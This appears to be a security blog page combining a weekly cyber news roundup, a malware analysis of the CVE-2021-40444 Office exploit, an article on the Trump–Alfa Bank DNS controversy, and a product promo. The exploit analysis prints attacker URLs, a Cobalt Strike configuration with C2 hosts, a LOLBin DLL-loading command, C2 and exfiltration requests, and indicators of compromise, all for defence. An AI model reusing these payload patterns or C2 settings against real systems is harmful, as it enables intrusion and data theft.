The Good, the Bad and the Ugly in Cybersecurity – Week 39

The Good

As we’ve noted before, the proliferation of ransomware is predicated on, among other things, the use of cryptocurrencies to facilitate the ease of criminals to receive payment and launder their profits. So we were delighted to learn this week that the U.S. Treasury Department has taken the step of sanctioning a cryptocurrency exchange for its role in laundering cyber ransoms for groups such as Ryuk, Conti, and Maze.

SUEX OTC, S.R.O. (aka “SUCCESSFUL EXCHANGE”) was added to the Office of Foreign Assets Control’s (OFAC) list of specially designated nationals on Tuesday. The designation prevents any U.S. person or business from engaging in transactions with SUEX and blocks all SUEX assets that are subject to U.S. jurisdiction. Organizations that engage in transactions with SUEX could also face sanctions or be subject to enforcement action. Ransomware victims should be especially careful to note that they could face potential sanctions for facilitating a ransomware payment to a sanctioned entity, and OFAC has updated its guidance on this as well.


Source

According to analysts, SUEX has received over $160 million in bitcoin from “illicit and high-risk sources” since 2018. Of that, $13 million is estimated to come from ransomware operators like Ryuk, Conti and Maze, $20 million from darknet markets, $24 million from scam operators, and $50 million from the illicit cryptocurrency exchange BTC-e, itself shut down in 2017 for laundering money for cybercriminals. The sanction against SUEX is a welcome step in cutting off cybercriminals’ access to easy payments. Let’s hope there’s more to come.

The Bad

Last week saw the beginning of a tough period for Apple with the FORCEDENTRY (aka CVE-2021-30860) exploit. Things have gone from bad to worse since then.

Thursday saw Apple back port a fix for FORCEDENTRY to iOS 12.5.4. It also released a patch for an entirely different zero-day (CVE-2021-30869) on macOS Catalina with the warning that the company was aware of an exploit in the wild leveraging the privilege escalation in the XNU kernel.

Earlier in the week, a researcher dropped an interesting-but-not-particularly dangerous macOS vulnerability that allows the unexpected execution of other files on the system.

A file with the .inetloc, .fileloc, .webloc, or .url extension can launch other executables on the system when double-clicked without first asking permission from the user.




  
    URL
    FiLe:////////////////////////System/Applications/Calculator.app
  

Reports that this could lead to remote code execution, however, were a little wide of the mark. The technique cannot be used to execute embedded code, though it could potentially be used to launch other files passed to the victim by an attacker. Such files themselves, however, could still trip over Gatekeeper, depending on the circumstances. Unconfirmed reports suggest the same researcher may have other, related bugs to reveal, so stay tuned for more on that.

Of more immediate concern, particularly to iOS users, was a raft of zero days published this week expressly because the researcher felt that Apple had not acted fairly or transparently to his attempts at responsible disclosure. Some of these exploits allow an application to escape sandboxing and read potentially sensitive data from Mail, Health, and other apps.

Rounding out the week’s dire security news for the Cupertino company, a Spanish iOS researcher dropped yet another (albeit, minor) zero day citing similar reasons of disenchantment with Apple’s treatment of his bug bounty submissions.

All in all, quite a week of bad news for Apple and its customers. Let’s hope that relations between the company and security researchers take a turn for the better going forward.

The Ugly

More details have emerged around the story we reported on last week regarding REvil’s reemergence and the appearance of a universal decryptor for previous victims. It’s a story that brings into sharp relief the challenges faced by both law enforcement and victims when dealing with the ransomware threat.

According to a report, mitigation for the recent mass-scale ransomware campaign conducted by REvil against Kaseya and its clients was deliberately delayed by the FBI. The agency reportedly secretly acquired a universal decryptor but held onto it for three weeks rather than giving it to victims.

The FBI had hoped to conduct an operation that would disrupt or take down the REvil gang and did not want to reveal their hand by exposing their possession of the key. For three weeks, many victims including schools and hospitals struggled with the effects of the ransomware, and all told businesses incurred millions of dollars in losses.

Balancing the immediate needs of victims against the longer-term payoff of putting a crimeware gang out of action is obviously a tough call, but it gets tougher when the strategy turns out to have been a flop.

By the time the FBI were ready to put their plan into action, the REvil gang had already done a disappearing act and the operation was no longer viable.

Strange coincidence or were the FBI’s operational plans themselves leaked by a hack? We’ll likely never know, but the end result is that the REvil gang is back in town, the FBI’s plan came to nothing, and a lot of victims are feeling the pain. Let’s hope the good guys have better luck next time.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Peeking into CVE-2021-40444 | MS Office Zero-Day Vulnerability Exploited in the Wild

Microsoft Office has long been a common attack vector, with abuse of its macro functionality a firm favorite of phishing and malspam attacks. These typically attempt to infect users through maliciously crafted Word or Excel files received as an attachment or as a download link via email. Macro-based attacks, however, require an extra social engineering step or two as such functionality has to be explicitly approved by the user on a per-document basis. CVE-2021-40444, however, is a Microsoft Office MSHTML Remote Code Execution Vulnerability that requires no macros and only a single approval to “display content”. Threat actors wasted no time in putting this zero day vulnerability to ill-use before Microsoft provided a fix in September’s Patch Tuesday. In this post, we provide a technical analysis of how this CVE is being exploited in the wild.

How Attackers Exploit CVE-2021-40444 In The Wild

Analysis of in-the-wild samples shows that, once approved, the malicious document exploiting CVE-2021-40444 loads remote HTML code with active JavaScript. The code is loaded into a “browser frame” which uses the mshtml.dll HTML Rendering library (one of the founding libraries of the old “Internet Explorer” Windows built-in browser).

A user who opens the malicious document will see a very short progress bar loading the remote content:

Once the remote content is downloaded, a normal Word document is displayed:

Looking at the .docx document relationships:

"<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html!x-usc:hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html" TargetMode="External"/>"

The “document.xml” contains an htmlfile OLE object:

The attacking code dynamically creates a new HTMLFile ActiveX object in-memory and injects into it JavaScript code that loads an HTML ActiveX installation object. The new object downloads a remote compressed .cab archive (hxxp://hidusi[.]com/e8c76295a5f9acb7/ministry.cab or hxxp://pawevi[.]com/e32c8df2cf6b7a16/differ.cab) containing an .inf file called championship.inf, which is supposed to describe the object’s installation parameters, but in this case is used to disguise the attacker’s DLL payload.

A snippet of the attacking code:

The attackers used a combination of old and new techniques. One of the old-school methods involved mhtml (side.html, help.html, specify.html, mountain.html) to load mime content (rfc: message/822), which is similar to an email message and allows the attackers to retrieve encapsulated payload files and avoid using traditional file downloads over the HTTP protocol.

This means that at least part of the payload will bypass most common web proxies, filtering and content validation systems.

Abusing LOLBins and Cobalt Strike with CVE-2021-40444

A classic characteristic of sophisticated attacks is the use of LOLBins (operating system built-in tools) to disguise the attack as normal system behavior. A well-known LOLBin is control.exe c:windowstasksfile.txt:evil.dll, which loads DLLs hidden inside an “Alternate Data Stream” (a file invisible to the Windows UI). The samples seen-to-date use this technique in combination with a .cpl extension and a “path traversal” to load a file written to disk by Microsoft Word.

This technique abuses Windows control panel control.exe to load the attackers championship.inf file. This file is typically dropped on disk at the following location:

C:Usersappdataroamingtempchampionship.inf

The malware can resolve the relative path to that location as

../../../../../Temp/championship.inf

The compilation date on observed samples was August 20, 2021, meaning this zero day exploit was in the wild at least 25 days before a patch was available.

The final payload is a Cobalt Strike Beacon DLL. Most observed samples communicate with a team server at /static-directory/media.gif and /static-directory/templates.gif to get the payload shellcode of type CobaltStrike_HTTPReverseShellcodex64.

Cobalt Strike Config:

{
  "BeaconType": [
    "HTTPS"
  ],
  "Port": 443,
  "SleepTime": 5000,
  "MaxGetSize": 2796542,
  "Jitter": 22,
  "C2Server": "dodefoh.com,/ml.html,joxinu.com,/hr.html",
  "HttpPostUri": "/ky",
  "Malleable_C2_Instructions": [
    "Remove 338 bytes from the beginning",
    "Base64 decode",
    "NetBIOS decode 'A'"
  ],
  "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==",
  "HttpGet_Verb": "GET",
  "HttpPost_Verb": "POST",
  "HttpPostChunk": 0,
  "Spawnto_x86": "%windir%syswow64rundll32.exe",
  "Spawnto_x64": "%windir%sysnativerundll32.exe",
  "CryptoScheme": 0,
  "Proxy_Behavior": "Use IE settings",
  "Watermark": 1580103814,
  "bStageCleanup": "True",
  "bCFGCaution": "False",
  "KillDate": 0,
  "bProcInject_StartRWX": "False",
  "bProcInject_UseRWX": "False",
  "bProcInject_MinAllocSize": 16583,
  "ProcInject_PrependAppend_x86": [
    "kJCQkJA=",
    "Empty"
  ],
  "ProcInject_PrependAppend_x64": [
    "kJCQkJA=",
    "Empty"
  ],
  "ProcInject_Execute": [
    "CreateThread",
    "CreateRemoteThread",
    "RtlCreateUserThread"
  ],
  "ProcInject_AllocationMethod": "VirtualAllocEx",
  "bUsesCookies": "True",
  "HostHeader": ""
}

The Cobalt Strike payload DLL was built using the Boost C++ framework and has lib_openssl (1.1.0f) statically compiled into it:

It downloads a remote shellcode:

The payload then uses WMI via COM (executed by the svchost.exe hosting RasMan [netsvcs]) to execute one of three built-in Windows apps:

On Windows 10, it’s usually wabmig.exe, the built-in “Windows Mail” application (%ProgramFiles%windows mailwabmig.exe). The payload DLL assumes SeDebugPrivilege and injects the shellcode into wabmig.exe. It then uses the same WMI process to run a PowerShell instance that deletes itself from the disk.

powershell -c "Sleep 5 ; Remove-Item -Path "C:Users..." -Force

Execution Flow

WinWord.exe -> Control.exe -> rundll32.exe -> requests payload from hxxps://macuwuf[.]com/get_load (User Agent: "bumblebee") -> svchost.exe (Remote Access Connection Manager, "svchost.exe -k netsvcs") -> wmiprvse.exe (WMI) -> wabmig.exe ("Windows Mail") -> Code Injection ->

       Request: dodefoh[.]com/static-directory/media.gif
       Headers: (Host: microsoft.com Headers: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9) -> request "dodefoh[.]com/ml.html?dbprefix=false"
       Host: microsoft.com Connection: close Cookie: HSID=qa4NarNdu0U3b92eKlbW78+/fox2qG9E/+DLkr/F8TZ2N3a+n3wlLc1Z/Z3cRoKi68NNajtE14NxgljBdE8Y1hHYU5Ix4JH3xIkib6AaM404V4CW3ztax68SJPOsiKpWUaE/D46n2EPLDF7ZDFdcUV/7p95zuv322d/2d988ktya1gq1
       
       Request: joxinu.com/hr.html?dbprefix=false
       Headers: 
       Host: microsoft.com Connection: close Cookie: HSID=Oq81LSBcgwKkbuXZuVfuqFy+RsvlqVcDbOHz1SzEyXHlNk75DH0dal5YxdpPR7rleMJ1LahF78Tig2CG504gkYLZa9Wi4amwV4gaKDMbC8qrVrjRTDpigDwTHLQ/iZIRwqAHSB2m4ARYDWaen1ZkFsz6n5ngu8WxSt7OMEw9qpsJ1zLy
       
powershell.exe -> delete payload dll       

The wabmig.exe sends an average of 400 HTTP GET requests of +-1.05kb each, randomized between the two host names joxinu[.]com and dodefoh[.]com at /avatars, /ml.js?restart=false and /hr.html?dbprefix=false. It leaks info from the host using encrypted data wrapped in base64 in the HTTP Header “HSID”.

Environments that are not setup to scan GET requests at the gateway/proxy would possibly overlook this traffic, or not properly recognize it as anomalous or malicious.

In the exfiltration part, one of the servers is typically in Germany and the other one is in the US.

Responses to Microsoft’s Patch for CVE-2021-40444

Since the discovery of the first samples, several exploit document builders have been published. These allow pentesters, defenders, and also lower caliber attackers to create exploit docs leveraging this vulnerability.

On the latest patch Tuesday (Sep 14, 2021), Microsoft released a patch for the CVE-2021-40444 vulnerability. Following the release of the patch, Microsoft published its own analysis of the attack using this exploit.

Chinese security researcher sunglin from 404 Team of KnownSec has published a reverse engineering analysis of Microsoft’s patch which demonstrates how Microsoft implemented the fix, overwriting filenames containing a “/” with “”.

There are already new tricks being used in order to bypass signatures and static detections for this exploit, the first being in-the-wild samples found using XML Entity Encoding and also a technique which seems to bypass Windows authenticode signature checking for .cab files being larger than 1Gb.

On Sep 19, 2021, a new variant of this exploit was published. This new variant doesn’t require a .cab file for exploitation and instead uses a .wsf Windows script file to execute code. In addition, researchers have suggested connections between the threat actors and the Ryuk ransomware group, although the exact nature of the connection remains unclear.

Defending Against Exploitation of CVE-2021-40444

Despite the fact that Microsoft has patched the underlying vulnerability, many organizations remain vulnerable to this type of attack either through failing to update in a timely fashion or from new variants that don’t use a .cab file.

SentinelOne customers are protected against this and related attacks.

Conclusion

Targeted attacks exploiting CVE-2021-40444 have been seen in the wild and appear to be ongoing. Sectors including critical infrastructure like Energy, Finance, IT and Telecoms have all reportedly been targeted, among others. SentinelOne urges enterprise security teams to take appropriate measures to ensure they are protected against this attack vector. If you would like to know more about how SentinelOne can keep your business safe from this and other attacks, contact us for more information or request a free demo.

Indicators of Compromise

Domains
dodefoh[.]com
hidusi[.]com
joxinu[.]com
macuwuf[.]com
pawevi[.]comsagoge[.]comrexagi[.]com
comecal[.]comcanarytokens[.]com

Word Document Samples
199b9e9a7533431731fbb08ff19d437de1de6533f3ebbffc1e13eeffaa4fd455
34ec4f2defd549b7c9a026b5498d09f5595ffe1396fe56509743820f20c610be
3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf
5b85dbe49b8bc1e65e01414a0508329dc41dc13c92c08a4f14c71e3044b06185
5e6e8883173603a0b3811302ee14a14c4f5708f1b756f2906a0749dd2fd1cfa0
938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52
a5f55361eff96ff070818640d417d2c822f9ae1cdd7e8fa0db943f37f6494db9
cb85def3a47325722d0f87adb1975f6536de09095c1af6229bdb12b7fc32423b
d0e1f97dbe2d0af9342e64d460527b088d85f96d38b1d1d4aa610c0987dca745
e48f134c321fdc31a646e747993b1592f576519d7ebbc0ae9b0eac7337eaf422

Cab Files
0efb0b8a4fd50dadd8092a50d64ce9eb81610c90704e1c3a973f00a431cf6738
1a59dd48c64354e42e5ebb77503cd661fcb4106de350345a7ab0a3c13145fe3a
1fb13a158aff3d258b8f62fe211fabeed03f0763b2acadbccad9e8e39969ea00
a8e04dc3ba71c5e56898a845d43e2d43ec39660679c971831d1a32740d3b125c
aabfa77fa08e7eae93dc418f53a29f9c2b660f3ef621c9cafb8c5ca42613ad56

DLL/EXE Payloads (championship.inf)
065308cf26326d94f18e246a31b14f3ca5425da2a9265c347856f31a49c2cc5c
1f97a721bba47628a3f3315280779cf19a2a935659976ffaab91279ff48dd091
3834f6a04b0a9cca41653967e46934932089adaa4de23ff5cfeecdd0e9258e72
47966d46657412e76755ca9c0f5d044e166feec9baaff30938504ddca4df3d37
6eedf45cb91f6762de4e35e36bcb03e5ad60ce9ac5a08caeb7eda035cd74762b
bd4b9f4b79f8a9eedc12abe3919cecb041c61022485b87b3a5cdfd1891e30670
cb091dbfd10645ba4ebf06d272e98cd98a2359bc0a0e115bf1ae6ad0073461e0
fbe575c75f754546bea925e921664ccf951900b10dbc4b5a3b4e2155333967a8


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Indictment, Lawsuits Revive Trump-Alfa Bank Story

In October 2016, media outlets reported that data collected by some of the world’s most renowned cybersecurity experts had identified frequent and unexplained communications between an email server used by the Trump Organization and Alfa Bank, one of Russia’s largest financial institutions. Those publications set off speculation about a possible secret back-channel of communications, as well as a series of lawsuits and investigations that culminated last week with the indictment of the same former federal cybercrime prosecutor who brought the data to the attention of the FBI five years ago.

The first page of Alfa Bank’s 2020 complaint.

Since 2018, access to an exhaustive report commissioned by the U.S. Senate Armed Services Committee on data that prompted those experts to seek out the FBI has been limited to a handful of Senate committee leaders, Alfa Bank, and special prosecutors appointed to look into the origins of the FBI investigation on alleged ties between Trump and Russia.

That report is now public, ironically thanks to a pair of lawsuits filed by Alfa Bank, which doesn’t directly dispute the information collected by the researchers. Rather, it claims that the data they found was the result of a “highly sophisticated cyberattacks against it in 2016 and 2017” intended “to fabricate apparent communications” between Alfa Bank and the Trump Organization.

The data at issue refers to communications traversing the Domain Name System (DNS), a global database that maps computer-friendly coordinates like Internet addresses (e.g., 8.8.8.8) to more human-friendly domain names (example.com). Whenever an Internet user gets online to visit a website or send an email, the user’s device sends a query through the Domain Name System.

Many different entities capture and record this DNS data as it traverses the public Internet, allowing researchers to go back later and see which Internet addresses resolved to what domain names, when, and for how long. Sometimes the metadata generated by these lookups can be used to identify or infer persistent network connections between different Internet hosts.

The DNS strangeness was first identified in 2016 by a group of security experts who told reporters they were alarmed at the hacking of the Democratic National Committee, and grew concerned that the same attackers might also target Republican leaders and institutions.

Scrutinizing the Trump Organization’s online footprint, the researchers determined that for several months during the spring and summer of 2016, Internet servers at Alfa Bank in Russia, Spectrum Health in Michigan, and Heartland Payment Systems in New Jersey accounted for nearly all of the several thousand DNS lookups for a specific Trump Organization server (mail1.trump-email.com).

This chart from a court filing Sept. 14, 2021 shows the top sources of traffic to the Trump Organization email server over a four month period in the spring and summer of 2016. DNS lookups from Alfa Bank constituted the majority of those requests.

The researchers said they couldn’t be sure what kind of communications between those servers had caused the DNS lookups, but concluded that the data would be extremely difficult to fabricate.

As recounted in this 2018 New Yorker story, New York Times journalist Eric Lichtblau met with FBI officials in late September 2016 to discuss the researchers’ findings. The bureau asked him to hold the story because publishing might disrupt an ongoing investigation. On Sept. 21, 2016, Lichtblau reportedly shared the DNS data with B.G.R., a Washington lobbying firm that worked with Alfa Bank.

Lichtblau’s reporting on the DNS findings ended up buried in an October 31, 2016 story titled “Investigating Donald Trump, F.B.I. Sees No Clear Link to Russia,” which stated that the FBI “ultimately concluded that there could be an innocuous explanation, like marketing email or spam,” that might explain the unusual DNS connections.

But that same day, Slate’s Franklin Foer published a story based on his interactions with the researchers. Foer noted that roughly two days after Lichtblau shared the DNS data with B.G.R., the Trump Organization email server domain vanished from the Internet — its domain effectively decoupled from its Internet address.

Foer wrote that The Times hadn’t yet been in touch with the Trump campaign about the DNS data when the Trump email domain suddenly went offline.  Odder still, four days later the Trump Organization created a new host — trump1.contact-client.com — and the very first DNS lookup to that new domain came from servers at Alfa Bank.

The researchers concluded that the new domain enabled communication to the very same server via a different route.

“When a new host name is created, the first communication with it is never random,” Foer wrote. “To reach the server after the resetting of the host name, the sender of the first inbound mail has to first learn of the name somehow. It’s simply impossible to randomly reach a renamed server.”

“That party had to have some kind of outbound message through SMS, phone, or some noninternet channel they used to communicate [the new configuration],” DNS expert Paul Vixie told Foer. “The first attempt to look up the revised host name came from Alfa Bank. If this was a public server, we would have seen other traces. The only look-ups came from this particular source.”

THE THEORIES

Both the Trump organization and Alfa Bank have denied using or establishing any sort of secret channel of communications, and have offered differing explanations as to how the data gathered by the experts could have been faked or misinterpreted.

In a follow-up story by Foer, the Trump Organization suggested that the DNS lookups might be the result of spam or email advertising various Trump properties, and said a Florida based marketing firm called Cendyn registered and managed the email server in question.

But Cendyn told CNN that its contract to provide email marketing services to the Trump Organization ended in March 2016 — weeks before the DNS lookups chronicled by the researchers started appearing. Cendyn told CNN that a different client had been communicating with Alfa Bank using Cendyn communications applications — a claim that Alfa Bank denied.

Alfa Bank subsequently hired computer forensics firms Mandiant and Stroz Friedberg to examine the DNS data presented by the researchers. Both companies concluded there was no evidence of email communications between Alfa Bank and the Trump Organization. However, both firms also acknowledged that Alfa Bank didn’t share any DNS data for the relevant four-month time period identified by the researchers.

Another theory for the DNS weirdness outlined in Mandiant’s report is that Alfa Bank’s servers performed the repeated DNS lookups for the Trump Organization server because its internal Trend Micro antivirus product routinely scanned domains in emails for signs of malicious activity — and that incoming marketing emails promoting Trump properties could have explained the traffic.

The researchers maintained this did not explain similar and repeated DNS lookups made to the Trump Organization email server by Spectrum Health, which is closely tied to the DeVos family (Betsy DeVos would later be appointed Secretary of Education by President Trump).

FISHING EXPEDITION

In June 2020, Alfa Bank filed two “John Doe” lawsuits, one in Pennsylvania and another in Florida. Their stated purpose was to identify the anonymous hackers behind the “highly sophisticated cyberattacks” that they claim were responsible for the mysterious DNS lookups.

Alfa Bank has so far subpoenaed at least 49 people or entities — including all of the security experts quoted in the 2016 media stories referenced above, and others who’d merely offered their perspectives on the matter via social media. At least 15 of those individuals or entities have since been deposed. Alfa Bank’s most recent subpoena was issued Aug. 26, 2021.

L. Jean Camp, a professor at the Indiana University School of Informatics and Computing, was among the first to publish some of the DNS data collected by the research group. In 2017, Alfa Bank sent Camp a series of threatening letters suggesting she was “a central figure” in the what the company would later claim was “malicious cyber activity targeting its computer network.” The letters and responses from her attorneys are published on her website.

Camp’s attorneys and Indiana University have managed to keep her from being deposed by both Alfa Bank and John H. Durham, the special counsel appointed by the Trump administration to look into the origins of the Russia investigation (although Camp said Alfa Bank was able to obtain certain emails through the school’s public records request policy).

“If MIT had had the commitment to academic freedom that Indiana University has shown throughout this entire process, Aaron Swartz would still be alive,” Camp said.

Camp said she’s bothered that the Alfa Bank and Trump special counsel investigations have cast the researchers in such a sinister light, when many of those subpoenaed have spent a lifetime trying to make the Internet more secure.

“Not including me, they’ve subpoenaed some people who are significant, consistent and important contributors to the security of American networks against the very attacks coming from Russia,” Camp said. “I think they’re using law enforcement to attack network security, and to determine the ways in which their previous attacks have been and are being detected.”

Nicholas Weaver, a lecturer at the computer science department at University of California, Berkeley, told KrebsOnSecurity he complied with the subpoena requests for specific emails he’d sent to colleagues about the DNS data, noting that Alfa Bank could have otherwise obtained them through the schools’ public records policy.

Weaver said Alfa Bank’s lawsuit has nothing to do with uncovering the truth about the DNS data, but rather with intimidating and silencing researchers who’ve spoken out about it.

“It’s clearly abusive, so I’m willing to call it out for what it is, which is a John Doe lawsuit for a fishing expedition,” Weaver said.

TURNABOUT IS FAIR PLAY

Among those subpoenaed and deposed by Alfa Bank was Daniel J. Jones, a former investigator for the FBI and the U.S. Senate who is perhaps best known for his role in leading the investigation into the U.S. Central Intelligence Agency’s use of torture in the wake of the Sept. 11 attacks.

Jones runs The Democracy Integrity Project (TDIP), a nonprofit in Washington, D.C. whose stated mission includes efforts to research, investigate and help mitigate foreign interference in elections in the United States and its allies overseas. In 2018, U.S. Senate investigators asked TDIP to produce and share a detailed analysis of the DNS data, which it did without payment. That lengthy report was never publicly released by the committee nor anyone else.

That is, until Sept. 14, 2021, when Jones and TDIP filed their own lawsuit against Alfa Bank. According to Jones’ complaint, Alfa Bank had entered into a confidentiality agreement regarding certain sensitive and personal information Jones was compelled to provide as part of complying with the subpoena.

Yet on Aug. 20, Alfa Bank attorneys sent written notice that it was challenging portions of the confidentiality agreement. Jones’ complaint asserts that Alfa Bank intends to publicly file portions of these confidential exhibits, an outcome that could jeopardize his safety.

This would not be the first time testimony Jones provided under a confidentiality agreement ended up in the public eye. TDIP’s complaint notes that before Jones met with FBI officials in 2017 to discuss Russian disinformation campaigns, he was assured by two FBI agents that his identity would be protected from exposure and that any information he provided to the FBI would not be associated with him.

Nevertheless, in 2018 the House Permanent Select Committee on Intelligence released a redacted report on Russian active measures. The report blacked out Jones’ name, but a series of footnotes in the report named his employer and included links to his organization’s website. Jones’ complaint spends several pages detailing the thousands of death threats he received after that report was published online.

THE TDIP REPORT

As part of his lawsuit against Alfa Bank, Jones published 40 pages from the 600+ page report he submitted to the U.S. Senate in 2018. From reviewing its table of contents, the remainder of the unpublished report appears to delve deeply into details about Alfa Bank’s history, its owners, and their connections to the Kremlin.

The report notes that unlike other domains the Trump Organization used to send mass marketing emails, the domain at issue — mail1.trump-email.com — was configured in such a way that would have prevented it from effectively sending marketing or bulk emails. Or at least prevented most of the missives sent through the domain from ever making it past spam filters.

Nor was the domain configured like other Trump Organization domains that demonstrably did send commercial email, Jones’ analysis found. Also, the mail1.trump-email.com domain was never once flagged as sending spam by any of the 57 different spam block lists published online at the time.

“If large amounts of marketing emails were emanating from mail1.trump-email.com, it’s likely that some receivers of those emails would have marked them as spam,” Jones’ 2018 report reasons. “Spam is nothing new on the internet, and mass mailings create easily observed phenomena, such as a wide dispersion of backscatter queries from spam filters. No such evidence is found in the logs.”

However, Jones’ report did find that mail1.trump-email.com was configured to accept incoming email. Jones cites testing conducted by one of the researchers who found the mail1.trump-email.com rejected messages with an automated reply saying the server couldn’t accept messages from that particular sender.

“This test reveals that either the server was configured to reject email from everyone, or that the server was configured to accept only emails from specific senders,” TDIP wrote.

The report also puts a finer point on the circumstances surrounding the disappearance of that Trump Organization email domain just two days after The New York Times shared the DNS data with Alfa Bank’s representatives.

“After the record was deleted for mail1.trump-email.com on Sept. 23, 2016, Alfa Bank and Spectrum Health continued to conduct DNS lookups for mail1.trump-email.com,” reads the report. “In the case of Alfa Bank, this behavior persisted until late Friday night on Sept. 23, 2016 (Moscow time). At that point, Alfa Bank ceased its DNS lookups of mail1.trump-email.com.”

Less than ten minutes later, a server assigned to Alfa Bank was the first source in the DNS data-set examined (37 million DNS records from January 1, 2016 to January 15, 2017) to conduct a DNS look-up for the server name ‘trump1.contact-client.com.’ The answer received was 66.216.133.29 — the same IP address used for mail1.trump-email.com that was deleted in the days after The New York Times inquired with Alfa Bank about the unusual server connections.

“No servers associated with Alfa Bank ever conducted a DNS lookup for trump1.contact-client.com again, and the next DNS look-up for trump1.contact-client.com did not occur until October 5, 2016,” the report continues. “Three of these five look-ups from October 2016 originated from Russia.”

A copy of the complaint filed by Jones against Alfa Bank is available here (PDF).

THE SUSSMANN INDICTMENT

The person who first brought the DNS data to the attention of the FBI in Sept. 2016 was Michael Sussmann, a 57-year-old cybersecurity lawyer and former computer crimes prosecutor who represented the Democratic National Committee and Hillary Clinton’s presidential campaign.

Last week, the special counsel Durham indicted Sussmann on charges of making a false statement to the FBI. The New York Times reports the accusation focuses on a meeting Sussmann had Sept. 19, 2016 with James A. Baker, the FBI’s top lawyer at the time. Sussmann had reportedly met with Baker to discuss the DNS data uncovered by the researchers.

“The indictment says Mr. Sussmann falsely told the F.B.I. lawyer that he had no clients, but he was really representing both a technology executive and the Hillary Clinton campaign,” The Times wrote.

Sussmann has pleaded not guilty to the charges.

ANALYSIS

The Sussmann indictment refers to the various researchers who contacted him in 2016 by placeholder names, such as Tech Executive-1 and Researcher-1 and Researcher-2. The tone of indictment reads as if describing a vast web of nefarious or illegal activities, although it doesn’t attempt to address the veracity of any specific concerns raised by the researchers.  Here is one example:

“From in or about July 2016 through at least in or about February 2017, however, Originator-I, Researcher-I, and Researcher-2 also exploited Internet Company­-1′ s data and other data to assist Tech Executive-I in his efforts to conduct research concerning Trump’s potential ties to Russia.”

Quoting from emails between Tech Executive-1 and the researchers, the indictment makes clear that Mr. Durham has subpoenaed many of the same researchers who’ve been subpoenaed and or deposed in the concurrent John Doe lawsuits from Russia’s Alfa Bank.

To date, Alfa Bank has yet to name a single defendant in its lawsuits. In the meantime, the Sussmann indictment is being dissected by many users on social media who have been closely following the Trump administration’s inquiry into the Russia investigation. The majority of these social media posts appear to be crowdsourcing an effort to pinpoint the real-life identities behind the placeholder names in the indictment.

At one level, it doesn’t matter which explanation of the DNS data you believe: There is a very real possibility that the way this entire inquiry has been handled could negatively affect the FBI’s ability to collect crucial and sensitive investigative tips for years to come.

After all, who in their right mind is going to volunteer confidential information to the FBI if they fear there’s even the slightest chance that future shifting political winds could end up seeing them prosecuted, threatened with physical violence or death on social media, and/or exposed to expensive legal fees and depositions from private companies as a result?

Such a perception could give rise to a sort of “chilling effect,” discouraging honest, well-meaning people from speaking up when they suspect or know about a potential threat to national security or sovereignty.

This would be a less-than-ideal outcome in the context of today’s top cyber threat for most organizations: Ransomware. With few exceptions, the U.S. government has watched helplessly as organized cybercrime gangs — many of whose members hail from Russia or from former Soviet nations that are friendly to Moscow — have extorted billions of dollars from victims, and disrupted or ruined countless businesses.

To help shift the playing field against ransomware actors, the Justice Department and other federal law enforcement agencies have been trying to encourage more ransomware victims to come forward and share sensitive details about their attacks. The U.S. government has even offered up to $10 million for information leading to the arrest and conviction of cybercriminals involved in ransomware.

But given the way the government has essentially shot the all of the messengers with its handling of the Sussmann case, who could blame those with useful and valid tips if they opted to stay silent?

Feature Spotlight: Introducing Singularity™ Conditional Policy

While security is taking the front row for many organizations, we still see too many others getting breached, facing the realities of ransomware, data theft, and extortion. These gaps require security professionals to be more efficient, flexible, and ready to face the changes enterprises need to be competitive and grow. Cybercriminals can target any organization, and that is why we have seen organizations investing time and resources in extending their security capabilities in detection, response, and recovery.

Two significant factors contribute to an effective cyber threat defense. First, prevention capabilities are all about blocking initial access to attackers; second, efficient detection and response are needed should a device be compromised.

Looking at prevention more closely, one major challenge is that most security policies are typically generic. At best, there might be a difference between High-Value-Asset (HVA)-type endpoints versus standard endpoints, but all security policies treat endpoints as equals regardless of whether the endpoint is considered compromised or not. Complex security policies often degrade the end-user experience, while light policies increase the available attack surface.

But what if security policies could be situationally-aware and automatically dial-up or dial-back security enforcement depending upon the endpoint’s risk status?

If we could do this, organizations would be able to make risk-based decisions. Today, SentinelOne is introducing Singularity Conditional Policy, a new Zero Trust Network (ZTN) feature that dynamically applies more security controls to devices that may be compromised, and then automatically unwinds these prudently-applied limitations once the device is deemed threat-free. With Singularity Conditional Policy, SentinelOne supports organizations in implementing Zero Trust Network (ZTN) concepts.

Introducing Singularity Conditional Policy

Singularity Conditional Policy is the world’s first endpoint-centric Conditional Policy Engine. Organizations can choose what their security configuration for healthy endpoints should be and choose a different configuration for risky endpoints. With this capability, we empower organizations to dynamically change security configurations based on the risk level of the endpoint.

Endpoints are no longer trusted by default but rather are continuously verified for their health state. When an active threat impacts a SentinelOne-protected endpoint, Singularity Conditional Policy temporarily moves the endpoint to the risky endpoint group and applies the respective security configuration. Once the threat is remediated, the endpoint moves back to the healthy endpoint group and is assigned its old security configuration. In this way, Singularity Conditional Policy helps reduce the attack surface and prevent potential further damage.

Singularity Conditional Policy is available for all SentinelOne customers. To enable Singularity Conditional Policy, just follow these two simple steps.

1. Create an Endpoint Group and Configure Relevant Security Controls

In the first step, you create a new endpoint group where compromised endpoints will be transferred in real-time by the Singularity Conditional Policy Engine.

Once the new endpoint group is created, you can configure the relevant security policies.

For example, you might want to enable protection mode for suspicious activities, ensure that compromised endpoints can’t communicate with specific domains or IP ranges, and prevent usage of USB or Bluetooth peripherals.

Create New Endpoint Group and Configure Security Policies

2. Install Singularity Conditional Policy

Now that you have your risky endpoint group created and the security policies configured, you can visit the Singularity Marketplace and simply install the Singularity Conditional Policy app.

Install Singularity Conditional Policy app through Singularity Marketplace

Real-Time Security Enforcement with Singularity Conditional Policy

